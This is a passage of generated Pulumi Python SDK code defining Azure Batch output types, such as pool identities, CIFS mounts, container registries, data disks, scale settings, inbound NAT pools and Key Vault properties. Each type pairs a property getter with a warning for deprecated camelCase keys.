        The list of user identities associated with the Batch pool. The user identity dictionary key references will be ARM resource ids in the form: '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ManagedIdentity/userAssignedIdentities/{identityName}'.
        """
        return pulumi.get(self, "user_assigned_identities")
@pulumi.output_type
class BatchPoolIdentityResponseUserAssignedIdentities(dict):
    """Output wrapper for a user-assigned identity's client id and principal
    id, keyed off a Batch pool.  Generated code.
    """
    # Warns when a deprecated camelCase dict key is used and points the
    # caller at the snake_case property getter instead.
    @staticmethod
    def __key_warning(key: str):
        suggest = None
        if key == "clientId":
            suggest = "client_id"
        elif key == "principalId":
            suggest = "principal_id"
        if suggest:
            pulumi.log.warn(f"Key '{key}' not found in BatchPoolIdentityResponseUserAssignedIdentities. Access the value via the '{suggest}' property getter instead.")
    def __getitem__(self, key: str) -> Any:
        BatchPoolIdentityResponseUserAssignedIdentities.__key_warning(key)
        return super().__getitem__(key)
    def get(self, key: str, default = None) -> Any:
        BatchPoolIdentityResponseUserAssignedIdentities.__key_warning(key)
        return super().get(key, default)
    def __init__(__self__, *,
                 client_id: str,
                 principal_id: str):
        """
        :param str client_id: The client id of user assigned identity.
        :param str principal_id: The principal id of user assigned identity.
        """
        pulumi.set(__self__, "client_id", client_id)
        pulumi.set(__self__, "principal_id", principal_id)
    @property
    @pulumi.getter(name="clientId")
    def client_id(self) -> str:
        """
        The client id of user assigned identity.
        """
        return pulumi.get(self, "client_id")
    @property
    @pulumi.getter(name="principalId")
    def principal_id(self) -> str:
        """
        The principal id of user assigned identity.
        """
        return pulumi.get(self, "principal_id")
@pulumi.output_type
class CIFSMountConfigurationResponse(dict):
    """Output wrapper for a CIFS mount: source, username/password, relative
    mount path and optional mount options.  Generated code.
    """
    # Warns when a deprecated camelCase dict key is used and points the
    # caller at the snake_case property getter instead.
    @staticmethod
    def __key_warning(key: str):
        suggest = None
        if key == "relativeMountPath":
            suggest = "relative_mount_path"
        elif key == "mountOptions":
            suggest = "mount_options"
        if suggest:
            pulumi.log.warn(f"Key '{key}' not found in CIFSMountConfigurationResponse. Access the value via the '{suggest}' property getter instead.")
    def __getitem__(self, key: str) -> Any:
        CIFSMountConfigurationResponse.__key_warning(key)
        return super().__getitem__(key)
    def get(self, key: str, default = None) -> Any:
        CIFSMountConfigurationResponse.__key_warning(key)
        return super().get(key, default)
    def __init__(__self__, *,
                 password: str,
                 relative_mount_path: str,
                 source: str,
                 username: str,
                 mount_options: Optional[str] = None):
        """
        :param str relative_mount_path: All file systems are mounted relative to the Batch mounts directory, accessible via the AZ_BATCH_NODE_MOUNTS_DIR environment variable.
        :param str mount_options: These are 'net use' options in Windows and 'mount' options in Linux.
        """
        pulumi.set(__self__, "password", password)
        pulumi.set(__self__, "relative_mount_path", relative_mount_path)
        pulumi.set(__self__, "source", source)
        pulumi.set(__self__, "username", username)
        if mount_options is not None:
            pulumi.set(__self__, "mount_options", mount_options)
    @property
    @pulumi.getter
    def password(self) -> str:
        return pulumi.get(self, "password")
    @property
    @pulumi.getter(name="relativeMountPath")
    def relative_mount_path(self) -> str:
        """
        All file systems are mounted relative to the Batch mounts directory, accessible via the AZ_BATCH_NODE_MOUNTS_DIR environment variable.
        """
        return pulumi.get(self, "relative_mount_path")
    @property
    @pulumi.getter
    def source(self) -> str:
        return pulumi.get(self, "source")
    @property
    @pulumi.getter
    def username(self) -> str:
        return pulumi.get(self, "username")
    @property
    @pulumi.getter(name="mountOptions")
    def mount_options(self) -> Optional[str]:
        """
        These are 'net use' options in Windows and 'mount' options in Linux.
        """
        return pulumi.get(self, "mount_options")
@pulumi.output_type
class CertificateReferenceResponse(dict):
    @staticmethod
    def __key_warning(key: str):
        # camelCase wire key -> snake_case property name.
        suggest = {
            "storeLocation": "store_location",
            "storeName": "store_name",
        }.get(key)
        if suggest:
            pulumi.log.warn(f"Key '{key}' not found in CertificateReferenceResponse. Access the value via the '{suggest}' property getter instead.")

    def __getitem__(self, key: str) -> Any:
        self.__key_warning(key)
        return super().__getitem__(key)

    def get(self, key: str, default=None) -> Any:
        self.__key_warning(key)
        return super().get(key, default)

    def __init__(__self__, *,
                 id: str,
                 store_location: Optional[str] = None,
                 store_name: Optional[str] = None,
                 visibility: Optional[Sequence[str]] = None):
        """
        :param str store_location: The default value is currentUser. This property is applicable only for pools configured with Windows nodes (that is, created with cloudServiceConfiguration, or with virtualMachineConfiguration using a Windows image reference). For Linux compute nodes, the certificates are stored in a directory inside the task working directory and an environment variable AZ_BATCH_CERTIFICATES_DIR is supplied to the task to query for this location. For certificates with visibility of 'remoteUser', a 'certs' directory is created in the user's home directory (e.g., /home/{user-name}/certs) and certificates are placed in that directory.
        :param str store_name: This property is applicable only for pools configured with Windows nodes (that is, created with cloudServiceConfiguration, or with virtualMachineConfiguration using a Windows image reference). Common store names include: My, Root, CA, Trust, Disallowed, TrustedPeople, TrustedPublisher, AuthRoot, AddressBook, but any custom store name can also be used. The default value is My.
        """
        pulumi.set(__self__, "id", id)
        # Optional attributes are stored only when explicitly provided.
        for attr, value in (("store_location", store_location),
                            ("store_name", store_name),
                            ("visibility", visibility)):
            if value is not None:
                pulumi.set(__self__, attr, value)

    @property
    @pulumi.getter
    def id(self) -> str:
        return pulumi.get(self, "id")

    @property
    @pulumi.getter(name="storeLocation")
    def store_location(self) -> Optional[str]:
        """The default value is currentUser. This property is applicable only for pools configured with Windows nodes (that is, created with cloudServiceConfiguration, or with virtualMachineConfiguration using a Windows image reference). For Linux compute nodes, the certificates are stored in a directory inside the task working directory and an environment variable AZ_BATCH_CERTIFICATES_DIR is supplied to the task to query for this location. For certificates with visibility of 'remoteUser', a 'certs' directory is created in the user's home directory (e.g., /home/{user-name}/certs) and certificates are placed in that directory."""
        return pulumi.get(self, "store_location")

    @property
    @pulumi.getter(name="storeName")
    def store_name(self) -> Optional[str]:
        """This property is applicable only for pools configured with Windows nodes (that is, created with cloudServiceConfiguration, or with virtualMachineConfiguration using a Windows image reference). Common store names include: My, Root, CA, Trust, Disallowed, TrustedPeople, TrustedPublisher, AuthRoot, AddressBook, but any custom store name can also be used. The default value is My."""
        return pulumi.get(self, "store_name")

    @property
    @pulumi.getter
    def visibility(self) -> Optional[Sequence[str]]:
        return pulumi.get(self, "visibility")
@pulumi.output_type
class CloudServiceConfigurationResponse(dict):
    @staticmethod
    def __key_warning(key: str):
        # camelCase wire key -> snake_case property name.
        suggest = {
            "osFamily": "os_family",
            "osVersion": "os_version",
        }.get(key)
        if suggest:
            pulumi.log.warn(f"Key '{key}' not found in CloudServiceConfigurationResponse. Access the value via the '{suggest}' property getter instead.")

    def __getitem__(self, key: str) -> Any:
        self.__key_warning(key)
        return super().__getitem__(key)

    def get(self, key: str, default=None) -> Any:
        self.__key_warning(key)
        return super().get(key, default)

    def __init__(__self__, *,
                 os_family: str,
                 os_version: Optional[str] = None):
        """
        :param str os_family: Possible values are: 2 - OS Family 2, equivalent to Windows Server 2008 R2 SP1. 3 - OS Family 3, equivalent to Windows Server 2012. 4 - OS Family 4, equivalent to Windows Server 2012 R2. 5 - OS Family 5, equivalent to Windows Server 2016. 6 - OS Family 6, equivalent to Windows Server 2019. For more information, see Azure Guest OS Releases (https://azure.microsoft.com/documentation/articles/cloud-services-guestos-update-matrix/#releases).
        :param str os_version: The default value is * which specifies the latest operating system version for the specified OS family.
        """
        pulumi.set(__self__, "os_family", os_family)
        if os_version is not None:
            pulumi.set(__self__, "os_version", os_version)

    @property
    @pulumi.getter(name="osFamily")
    def os_family(self) -> str:
        """Possible values are: 2 - OS Family 2, equivalent to Windows Server 2008 R2 SP1. 3 - OS Family 3, equivalent to Windows Server 2012. 4 - OS Family 4, equivalent to Windows Server 2012 R2. 5 - OS Family 5, equivalent to Windows Server 2016. 6 - OS Family 6, equivalent to Windows Server 2019. For more information, see Azure Guest OS Releases (https://azure.microsoft.com/documentation/articles/cloud-services-guestos-update-matrix/#releases)."""
        return pulumi.get(self, "os_family")

    @property
    @pulumi.getter(name="osVersion")
    def os_version(self) -> Optional[str]:
        """The default value is * which specifies the latest operating system version for the specified OS family."""
        return pulumi.get(self, "os_version")
@pulumi.output_type
class ContainerConfigurationResponse(dict):
    @staticmethod
    def __key_warning(key: str):
        # camelCase wire key -> snake_case property name.
        suggest = {
            "containerImageNames": "container_image_names",
            "containerRegistries": "container_registries",
        }.get(key)
        if suggest:
            pulumi.log.warn(f"Key '{key}' not found in ContainerConfigurationResponse. Access the value via the '{suggest}' property getter instead.")

    def __getitem__(self, key: str) -> Any:
        self.__key_warning(key)
        return super().__getitem__(key)

    def get(self, key: str, default=None) -> Any:
        self.__key_warning(key)
        return super().get(key, default)

    def __init__(__self__, *,
                 type: str,
                 container_image_names: Optional[Sequence[str]] = None,
                 container_registries: Optional[Sequence['outputs.ContainerRegistryResponse']] = None):
        """
        :param Sequence[str] container_image_names: This is the full image reference, as would be specified to "docker pull". An image will be sourced from the default Docker registry unless the image is fully qualified with an alternative registry.
        :param Sequence['ContainerRegistryResponse'] container_registries: If any images must be downloaded from a private registry which requires credentials, then those credentials must be provided here.
        """
        pulumi.set(__self__, "type", type)
        # Optional attributes are stored only when explicitly provided.
        for attr, value in (("container_image_names", container_image_names),
                            ("container_registries", container_registries)):
            if value is not None:
                pulumi.set(__self__, attr, value)

    @property
    @pulumi.getter
    def type(self) -> str:
        return pulumi.get(self, "type")

    @property
    @pulumi.getter(name="containerImageNames")
    def container_image_names(self) -> Optional[Sequence[str]]:
        """This is the full image reference, as would be specified to "docker pull". An image will be sourced from the default Docker registry unless the image is fully qualified with an alternative registry."""
        return pulumi.get(self, "container_image_names")

    @property
    @pulumi.getter(name="containerRegistries")
    def container_registries(self) -> Optional[Sequence['outputs.ContainerRegistryResponse']]:
        """If any images must be downloaded from a private registry which requires credentials, then those credentials must be provided here."""
        return pulumi.get(self, "container_registries")
@pulumi.output_type
class ContainerRegistryResponse(dict):
    @staticmethod
    def __key_warning(key: str):
        # camelCase wire key -> snake_case property name.
        suggest = {
            "userName": "user_name",
            "registryServer": "registry_server",
        }.get(key)
        if suggest:
            pulumi.log.warn(f"Key '{key}' not found in ContainerRegistryResponse. Access the value via the '{suggest}' property getter instead.")

    def __getitem__(self, key: str) -> Any:
        self.__key_warning(key)
        return super().__getitem__(key)

    def get(self, key: str, default=None) -> Any:
        self.__key_warning(key)
        return super().get(key, default)

    def __init__(__self__, *,
                 password: str,
                 user_name: str,
                 registry_server: Optional[str] = None):
        """
        :param str registry_server: If omitted, the default is "docker.io".
        """
        pulumi.set(__self__, "password", password)
        pulumi.set(__self__, "user_name", user_name)
        if registry_server is not None:
            pulumi.set(__self__, "registry_server", registry_server)

    @property
    @pulumi.getter
    def password(self) -> str:
        return pulumi.get(self, "password")

    @property
    @pulumi.getter(name="userName")
    def user_name(self) -> str:
        return pulumi.get(self, "user_name")

    @property
    @pulumi.getter(name="registryServer")
    def registry_server(self) -> Optional[str]:
        """If omitted, the default is "docker.io"."""
        return pulumi.get(self, "registry_server")
@pulumi.output_type
class DataDiskResponse(dict):
    """
    Settings which will be used by the data disks associated to Compute Nodes in the Pool. When using attached data disks, you need to mount and format the disks from within a VM to use them.
    """
    @staticmethod
    def __key_warning(key: str):
        # camelCase wire key -> snake_case property name.
        suggest = {
            "diskSizeGB": "disk_size_gb",
            "storageAccountType": "storage_account_type",
        }.get(key)
        if suggest:
            pulumi.log.warn(f"Key '{key}' not found in DataDiskResponse. Access the value via the '{suggest}' property getter instead.")

    def __getitem__(self, key: str) -> Any:
        self.__key_warning(key)
        return super().__getitem__(key)

    def get(self, key: str, default=None) -> Any:
        self.__key_warning(key)
        return super().get(key, default)

    def __init__(__self__, *,
                 disk_size_gb: int,
                 lun: int,
                 caching: Optional[str] = None,
                 storage_account_type: Optional[str] = None):
        """
        Settings which will be used by the data disks associated to Compute Nodes in the Pool. When using attached data disks, you need to mount and format the disks from within a VM to use them.
        :param int lun: The lun is used to uniquely identify each data disk. If attaching multiple disks, each should have a distinct lun. The value must be between 0 and 63, inclusive.
        :param str caching: Values are:
                none - The caching mode for the disk is not enabled.
                readOnly - The caching mode for the disk is read only.
                readWrite - The caching mode for the disk is read and write.
                The default value for caching is none. For information about the caching options see: https://blogs.msdn.microsoft.com/windowsazurestorage/2012/06/27/exploring-windows-azure-drives-disks-and-images/.
        :param str storage_account_type: If omitted, the default is "Standard_LRS". Values are:
                Standard_LRS - The data disk should use standard locally redundant storage.
                Premium_LRS - The data disk should use premium locally redundant storage.
        """
        pulumi.set(__self__, "disk_size_gb", disk_size_gb)
        pulumi.set(__self__, "lun", lun)
        # Optional attributes are stored only when explicitly provided.
        for attr, value in (("caching", caching),
                            ("storage_account_type", storage_account_type)):
            if value is not None:
                pulumi.set(__self__, attr, value)

    @property
    @pulumi.getter(name="diskSizeGB")
    def disk_size_gb(self) -> int:
        return pulumi.get(self, "disk_size_gb")

    @property
    @pulumi.getter
    def lun(self) -> int:
        """The lun is used to uniquely identify each data disk. If attaching multiple disks, each should have a distinct lun. The value must be between 0 and 63, inclusive."""
        return pulumi.get(self, "lun")

    @property
    @pulumi.getter
    def caching(self) -> Optional[str]:
        """
        Values are:
         none - The caching mode for the disk is not enabled.
         readOnly - The caching mode for the disk is read only.
         readWrite - The caching mode for the disk is read and write.
         The default value for caching is none. For information about the caching options see: https://blogs.msdn.microsoft.com/windowsazurestorage/2012/06/27/exploring-windows-azure-drives-disks-and-images/.
        """
        return pulumi.get(self, "caching")

    @property
    @pulumi.getter(name="storageAccountType")
    def storage_account_type(self) -> Optional[str]:
        """
        If omitted, the default is "Standard_LRS". Values are:
         Standard_LRS - The data disk should use standard locally redundant storage.
         Premium_LRS - The data disk should use premium locally redundant storage.
        """
        return pulumi.get(self, "storage_account_type")
@pulumi.output_type
class DeleteCertificateErrorResponse(dict):
    """
    An error response from the Batch service.
    """
    def __init__(__self__, *,
                 code: str,
                 message: str,
                 details: Optional[Sequence['outputs.DeleteCertificateErrorResponse']] = None,
                 target: Optional[str] = None):
        """
        An error response from the Batch service.
        :param str code: An identifier for the error. Codes are invariant and are intended to be consumed programmatically.
        :param str message: A message describing the error, intended to be suitable for display in a user interface.
        :param Sequence['DeleteCertificateErrorResponse'] details: A list of additional details about the error.
        :param str target: The target of the particular error. For example, the name of the property in error.
        """
        pulumi.set(__self__, "code", code)
        pulumi.set(__self__, "message", message)
        # Optional attributes are stored only when explicitly provided.
        for attr, value in (("details", details), ("target", target)):
            if value is not None:
                pulumi.set(__self__, attr, value)

    @property
    @pulumi.getter
    def code(self) -> str:
        """An identifier for the error. Codes are invariant and are intended to be consumed programmatically."""
        return pulumi.get(self, "code")

    @property
    @pulumi.getter
    def message(self) -> str:
        """A message describing the error, intended to be suitable for display in a user interface."""
        return pulumi.get(self, "message")

    @property
    @pulumi.getter
    def details(self) -> Optional[Sequence['outputs.DeleteCertificateErrorResponse']]:
        """A list of additional details about the error."""
        return pulumi.get(self, "details")

    @property
    @pulumi.getter
    def target(self) -> Optional[str]:
        """The target of the particular error. For example, the name of the property in error."""
        return pulumi.get(self, "target")
@pulumi.output_type
class DeploymentConfigurationResponse(dict):
    @staticmethod
    def __key_warning(key: str):
        # camelCase wire key -> snake_case property name.
        suggest = {
            "cloudServiceConfiguration": "cloud_service_configuration",
            "virtualMachineConfiguration": "virtual_machine_configuration",
        }.get(key)
        if suggest:
            pulumi.log.warn(f"Key '{key}' not found in DeploymentConfigurationResponse. Access the value via the '{suggest}' property getter instead.")

    def __getitem__(self, key: str) -> Any:
        self.__key_warning(key)
        return super().__getitem__(key)

    def get(self, key: str, default=None) -> Any:
        self.__key_warning(key)
        return super().get(key, default)

    def __init__(__self__, *,
                 cloud_service_configuration: Optional['outputs.CloudServiceConfigurationResponse'] = None,
                 virtual_machine_configuration: Optional['outputs.VirtualMachineConfigurationResponse'] = None):
        """
        :param 'CloudServiceConfigurationResponse' cloud_service_configuration: This property and virtualMachineConfiguration are mutually exclusive and one of the properties must be specified. This property cannot be specified if the Batch account was created with its poolAllocationMode property set to 'UserSubscription'.
        :param 'VirtualMachineConfigurationResponse' virtual_machine_configuration: This property and cloudServiceConfiguration are mutually exclusive and one of the properties must be specified.
        """
        # Both attributes are optional; only present values are stored.
        for attr, value in (("cloud_service_configuration", cloud_service_configuration),
                            ("virtual_machine_configuration", virtual_machine_configuration)):
            if value is not None:
                pulumi.set(__self__, attr, value)

    @property
    @pulumi.getter(name="cloudServiceConfiguration")
    def cloud_service_configuration(self) -> Optional['outputs.CloudServiceConfigurationResponse']:
        """This property and virtualMachineConfiguration are mutually exclusive and one of the properties must be specified. This property cannot be specified if the Batch account was created with its poolAllocationMode property set to 'UserSubscription'."""
        return pulumi.get(self, "cloud_service_configuration")

    @property
    @pulumi.getter(name="virtualMachineConfiguration")
    def virtual_machine_configuration(self) -> Optional['outputs.VirtualMachineConfigurationResponse']:
        """This property and cloudServiceConfiguration are mutually exclusive and one of the properties must be specified."""
        return pulumi.get(self, "virtual_machine_configuration")
@pulumi.output_type
class DiskEncryptionConfigurationResponse(dict):
    """
    The disk encryption configuration applied on compute nodes in the pool. Disk encryption configuration is not supported on Linux pool created with Virtual Machine Image or Shared Image Gallery Image.
    """
    def __init__(__self__, *,
                 targets: Optional[Sequence[str]] = None):
        """
        The disk encryption configuration applied on compute nodes in the pool. Disk encryption configuration is not supported on Linux pool created with Virtual Machine Image or Shared Image Gallery Image.
        :param Sequence[str] targets: On Linux pool, only "TemporaryDisk" is supported; on Windows pool, "OsDisk" and "TemporaryDisk" must be specified.
        """
        # The lone attribute is optional; store it only when given.
        if targets is not None:
            pulumi.set(__self__, "targets", targets)

    @property
    @pulumi.getter
    def targets(self) -> Optional[Sequence[str]]:
        """On Linux pool, only "TemporaryDisk" is supported; on Windows pool, "OsDisk" and "TemporaryDisk" must be specified."""
        return pulumi.get(self, "targets")
@pulumi.output_type
class EncryptionPropertiesResponse(dict):
    """
    Configures how customer data is encrypted inside the Batch account. By default, accounts are encrypted using a Microsoft managed key. For additional control, a customer-managed key can be used instead.
    """
    @staticmethod
    def __key_warning(key: str):
        # camelCase wire key -> snake_case property name.
        suggest = {
            "keySource": "key_source",
            "keyVaultProperties": "key_vault_properties",
        }.get(key)
        if suggest:
            pulumi.log.warn(f"Key '{key}' not found in EncryptionPropertiesResponse. Access the value via the '{suggest}' property getter instead.")

    def __getitem__(self, key: str) -> Any:
        self.__key_warning(key)
        return super().__getitem__(key)

    def get(self, key: str, default=None) -> Any:
        self.__key_warning(key)
        return super().get(key, default)

    def __init__(__self__, *,
                 key_source: Optional[str] = None,
                 key_vault_properties: Optional['outputs.KeyVaultPropertiesResponse'] = None):
        """
        Configures how customer data is encrypted inside the Batch account. By default, accounts are encrypted using a Microsoft managed key. For additional control, a customer-managed key can be used instead.
        :param str key_source: Type of the key source.
        :param 'KeyVaultPropertiesResponse' key_vault_properties: Additional details when using Microsoft.KeyVault
        """
        # Both attributes are optional; only present values are stored.
        for attr, value in (("key_source", key_source),
                            ("key_vault_properties", key_vault_properties)):
            if value is not None:
                pulumi.set(__self__, attr, value)

    @property
    @pulumi.getter(name="keySource")
    def key_source(self) -> Optional[str]:
        """Type of the key source."""
        return pulumi.get(self, "key_source")

    @property
    @pulumi.getter(name="keyVaultProperties")
    def key_vault_properties(self) -> Optional['outputs.KeyVaultPropertiesResponse']:
        """Additional details when using Microsoft.KeyVault"""
        return pulumi.get(self, "key_vault_properties")
@pulumi.output_type
class EnvironmentSettingResponse(dict):
    """A name/value pair output type with a required name and an optional value."""
    def __init__(__self__, *,
                 name: str,
                 value: Optional[str] = None):
        pulumi.set(__self__, "name", name)
        # The value is optional; store it only when given.
        if value is not None:
            pulumi.set(__self__, "value", value)

    @property
    @pulumi.getter
    def name(self) -> str:
        return pulumi.get(self, "name")

    @property
    @pulumi.getter
    def value(self) -> Optional[str]:
        return pulumi.get(self, "value")
@pulumi.output_type
class FixedScaleSettingsResponse(dict):
    @staticmethod
    def __key_warning(key: str):
        # camelCase wire key -> snake_case property name.
        suggest = {
            "nodeDeallocationOption": "node_deallocation_option",
            "resizeTimeout": "resize_timeout",
            "targetDedicatedNodes": "target_dedicated_nodes",
            "targetLowPriorityNodes": "target_low_priority_nodes",
        }.get(key)
        if suggest:
            pulumi.log.warn(f"Key '{key}' not found in FixedScaleSettingsResponse. Access the value via the '{suggest}' property getter instead.")

    def __getitem__(self, key: str) -> Any:
        self.__key_warning(key)
        return super().__getitem__(key)

    def get(self, key: str, default=None) -> Any:
        self.__key_warning(key)
        return super().get(key, default)

    def __init__(__self__, *,
                 node_deallocation_option: Optional[str] = None,
                 resize_timeout: Optional[str] = None,
                 target_dedicated_nodes: Optional[int] = None,
                 target_low_priority_nodes: Optional[int] = None):
        """
        :param str node_deallocation_option: If omitted, the default value is Requeue.
        :param str resize_timeout: The default value is 15 minutes. Timeout values use ISO 8601 format. For example, use PT10M for 10 minutes. The minimum value is 5 minutes. If you specify a value less than 5 minutes, the Batch service rejects the request with an error; if you are calling the REST API directly, the HTTP status code is 400 (Bad Request).
        :param int target_dedicated_nodes: At least one of targetDedicatedNodes, targetLowPriorityNodes must be set.
        :param int target_low_priority_nodes: At least one of targetDedicatedNodes, targetLowPriorityNodes must be set.
        """
        # All attributes are optional; only present values are stored.
        for attr, value in (("node_deallocation_option", node_deallocation_option),
                            ("resize_timeout", resize_timeout),
                            ("target_dedicated_nodes", target_dedicated_nodes),
                            ("target_low_priority_nodes", target_low_priority_nodes)):
            if value is not None:
                pulumi.set(__self__, attr, value)

    @property
    @pulumi.getter(name="nodeDeallocationOption")
    def node_deallocation_option(self) -> Optional[str]:
        """If omitted, the default value is Requeue."""
        return pulumi.get(self, "node_deallocation_option")

    @property
    @pulumi.getter(name="resizeTimeout")
    def resize_timeout(self) -> Optional[str]:
        """The default value is 15 minutes. Timeout values use ISO 8601 format. For example, use PT10M for 10 minutes. The minimum value is 5 minutes. If you specify a value less than 5 minutes, the Batch service rejects the request with an error; if you are calling the REST API directly, the HTTP status code is 400 (Bad Request)."""
        return pulumi.get(self, "resize_timeout")

    @property
    @pulumi.getter(name="targetDedicatedNodes")
    def target_dedicated_nodes(self) -> Optional[int]:
        """At least one of targetDedicatedNodes, targetLowPriorityNodes must be set."""
        return pulumi.get(self, "target_dedicated_nodes")

    @property
    @pulumi.getter(name="targetLowPriorityNodes")
    def target_low_priority_nodes(self) -> Optional[int]:
        """At least one of targetDedicatedNodes, targetLowPriorityNodes must be set."""
        return pulumi.get(self, "target_low_priority_nodes")
@pulumi.output_type
class ImageReferenceResponse(dict):
    """Reference to a platform or Shared Image Gallery image; all fields are optional."""
    def __init__(__self__, *,
                 id: Optional[str] = None,
                 offer: Optional[str] = None,
                 publisher: Optional[str] = None,
                 sku: Optional[str] = None,
                 version: Optional[str] = None):
        """
        :param str id: This property is mutually exclusive with other properties. The Shared Image Gallery image must have replicas in the same region as the Azure Batch account. For information about the firewall settings for the Batch node agent to communicate with the Batch service see https://docs.microsoft.com/en-us/azure/batch/batch-api-basics#virtual-network-vnet-and-firewall-configuration.
        :param str offer: For example, UbuntuServer or WindowsServer.
        :param str publisher: For example, Canonical or MicrosoftWindowsServer.
        :param str sku: For example, 18.04-LTS or 2019-Datacenter.
        :param str version: A value of 'latest' can be specified to select the latest version of an image. If omitted, the default is 'latest'.
        """
        # Every attribute is optional; only present values are stored.
        for attr, value in (("id", id),
                            ("offer", offer),
                            ("publisher", publisher),
                            ("sku", sku),
                            ("version", version)):
            if value is not None:
                pulumi.set(__self__, attr, value)

    @property
    @pulumi.getter
    def id(self) -> Optional[str]:
        """This property is mutually exclusive with other properties. The Shared Image Gallery image must have replicas in the same region as the Azure Batch account. For information about the firewall settings for the Batch node agent to communicate with the Batch service see https://docs.microsoft.com/en-us/azure/batch/batch-api-basics#virtual-network-vnet-and-firewall-configuration."""
        return pulumi.get(self, "id")

    @property
    @pulumi.getter
    def offer(self) -> Optional[str]:
        """For example, UbuntuServer or WindowsServer."""
        return pulumi.get(self, "offer")

    @property
    @pulumi.getter
    def publisher(self) -> Optional[str]:
        """For example, Canonical or MicrosoftWindowsServer."""
        return pulumi.get(self, "publisher")

    @property
    @pulumi.getter
    def sku(self) -> Optional[str]:
        """For example, 18.04-LTS or 2019-Datacenter."""
        return pulumi.get(self, "sku")

    @property
    @pulumi.getter
    def version(self) -> Optional[str]:
        """A value of 'latest' can be specified to select the latest version of an image. If omitted, the default is 'latest'."""
        return pulumi.get(self, "version")
@pulumi.output_type
class InboundNatPoolResponse(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "backendPort":
suggest = "backend_port"
elif key == "frontendPortRangeEnd":
suggest = "frontend_port_range_end"
elif key == "frontendPortRangeStart":
suggest = "frontend_port_range_start"
elif key == "networkSecurityGroupRules":
suggest = "network_security_group_rules"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in InboundNatPoolResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
InboundNatPoolResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
InboundNatPoolResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
backend_port: int,
frontend_port_range_end: int,
frontend_port_range_start: int,
name: str,
protocol: str,
network_security_group_rules: Optional[Sequence['outputs.NetworkSecurityGroupRuleResponse']] = None):
"""
:param int backend_port: This must be unique within a Batch pool. Acceptable values are between 1 and 65535 except for 22, 3389, 29876 and 29877 as these are reserved. If any reserved values are provided the request fails with HTTP status code 400.
:param int frontend_port_range_end: Acceptable values range between 1 and 65534 except ports from 50000 to 55000 which are reserved by the Batch service. All ranges within a pool must be distinct and cannot overlap. If any reserved or overlapping values are provided the request fails with HTTP status code 400.
:param int frontend_port_range_start: Acceptable values range between 1 and 65534 except ports from 50000 to 55000 which are reserved. All ranges within a pool must be distinct and cannot overlap. If any reserved or overlapping values are provided the request fails with HTTP status code 400.
:param str name: The name must be unique within a Batch pool, can contain letters, numbers, underscores, periods, and hyphens. Names must start with a letter or number, must end with a letter, number, or underscore, and cannot exceed 77 characters. If any invalid values are provided the request fails with HTTP status code 400.
:param Sequence['NetworkSecurityGroupRuleResponse'] network_security_group_rules: The maximum number of rules that can be specified across all the endpoints on a Batch pool is 25. If no network security group rules are specified, a default rule will be created to allow inbound access to the specified backendPort. If the maximum number of network security group rules is exceeded the request fails with HTTP status code 400.
"""
pulumi.set(__self__, "backend_port", backend_port)
pulumi.set(__self__, "frontend_port_range_end", frontend_port_range_end)
pulumi.set(__self__, "frontend_port_range_start", frontend_port_range_start)
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "protocol", protocol)
if network_security_group_rules is not None:
pulumi.set(__self__, "network_security_group_rules", network_security_group_rules)
@property
@pulumi.getter(name="backendPort")
def backend_port(self) -> int:
"""
This must be unique within a Batch pool. Acceptable values are between 1 and 65535 except for 22, 3389, 29876 and 29877 as these are reserved. If any reserved values are provided the request fails with HTTP status code 400.
"""
return pulumi.get(self, "backend_port")
@property
@pulumi.getter(name="frontendPortRangeEnd")
def frontend_port_range_end(self) -> int:
"""
Acceptable values range between 1 and 65534 except ports from 50000 to 55000 which are reserved by the Batch service. All ranges within a pool must be distinct and cannot overlap. If any reserved or overlapping values are provided the request fails with HTTP status code 400.
"""
return pulumi.get(self, "frontend_port_range_end")
@property
@pulumi.getter(name="frontendPortRangeStart")
def frontend_port_range_start(self) -> int:
"""
Acceptable values range between 1 and 65534 except ports from 50000 to 55000 which are reserved. All ranges within a pool must be distinct and cannot overlap. If any reserved or overlapping values are provided the request fails with HTTP status code 400.
"""
return pulumi.get(self, "frontend_port_range_start")
@property
@pulumi.getter
def name(self) -> str:
"""
The name must be unique within a Batch pool, can contain letters, numbers, underscores, periods, and hyphens. Names must start with a letter or number, must end with a letter, number, or underscore, and cannot exceed 77 characters. If any invalid values are provided the request fails with HTTP status code 400.
"""
return pulumi.get(self, "name")
    @property
    @pulumi.getter
    def protocol(self) -> str:
        # NOTE(review): value appears to be a service-defined protocol string
        # (e.g. per Azure Batch InboundNatPool docs) — confirm against the API.
        return pulumi.get(self, "protocol")
    @property
    @pulumi.getter(name="networkSecurityGroupRules")
    def network_security_group_rules(self) -> Optional[Sequence['outputs.NetworkSecurityGroupRuleResponse']]:
        """
        Optional network security group rules applied to the endpoint.

        The maximum number of rules that can be specified across all the endpoints on a Batch pool is 25. If no network security group rules are specified, a default rule will be created to allow inbound access to the specified backendPort. If the maximum number of network security group rules is exceeded the request fails with HTTP status code 400.
        """
        return pulumi.get(self, "network_security_group_rules")
@pulumi.output_type
class KeyVaultPropertiesResponse(dict):
    """
    KeyVault configuration when using an encryption KeySource of Microsoft.KeyVault.
    """
    @staticmethod
    def __key_warning(key: str):
        # camelCase wire keys mapped to their snake_case property names.
        renamed = {
            "keyIdentifier": "key_identifier",
        }
        suggest = renamed.get(key)
        if suggest:
            pulumi.log.warn(f"Key '{key}' not found in KeyVaultPropertiesResponse. Access the value via the '{suggest}' property getter instead.")

    def __getitem__(self, key: str) -> Any:
        KeyVaultPropertiesResponse.__key_warning(key)
        return super().__getitem__(key)

    def get(self, key: str, default = None) -> Any:
        KeyVaultPropertiesResponse.__key_warning(key)
        return super().get(key, default)

    def __init__(__self__, *,
                 key_identifier: Optional[str] = None):
        """
        KeyVault configuration when using an encryption KeySource of Microsoft.KeyVault.

        :param str key_identifier: Full path to the versioned secret, e.g.
            https://mykeyvault.vault.azure.net/keys/testkey/6e34a81fef704045975661e297a4c053.
            To be usable, the Batch account must have a system-assigned identity granted
            Key/Get, Key/Unwrap and Key/Wrap permissions, and the KeyVault must have
            soft-delete and purge protection enabled.
        """
        # Optional field: only persist it when the caller supplied a value.
        if key_identifier is not None:
